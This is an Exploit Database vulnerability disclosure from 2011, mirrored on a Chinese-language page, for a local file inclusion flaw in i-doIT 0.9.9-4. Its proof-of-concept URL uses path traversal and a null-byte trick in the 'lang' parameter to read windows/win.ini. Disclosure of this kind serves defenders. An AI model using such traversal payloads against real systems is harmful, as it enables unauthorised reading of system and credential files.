i-doIT 0.9.9-4 – Local File Inclusion

• Exploit Database
• 121 阅读

• 作者： AutoSec Tools
  日期： 2011-05-25
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17320/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24

  # ------------------------------------------------------------------------ # Software................i-doIT 0.9.9-4 # Vulnerability...........Local File Inclusion # Threat Level............Critical (4/5) # Download................http://www.i-doit.org/ # Discovery Date..........5/23/2011 # Tested On...............Windows Vista + XAMPP # ------------------------------------------------------------------------ # Author..................AutoSec Tools # Site....................http://www.autosectools.com/ # Email...................John Leitch <john@autosectools.com> # ------------------------------------------------------------------------ # # # --Description-- # # A local file inclusion vulnerability in i-doIT 0.9.9-4 can be # exploited to include arbitrary files. # # # --PoC--   http://localhost/idoit/controller.php?load=&lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00.jpg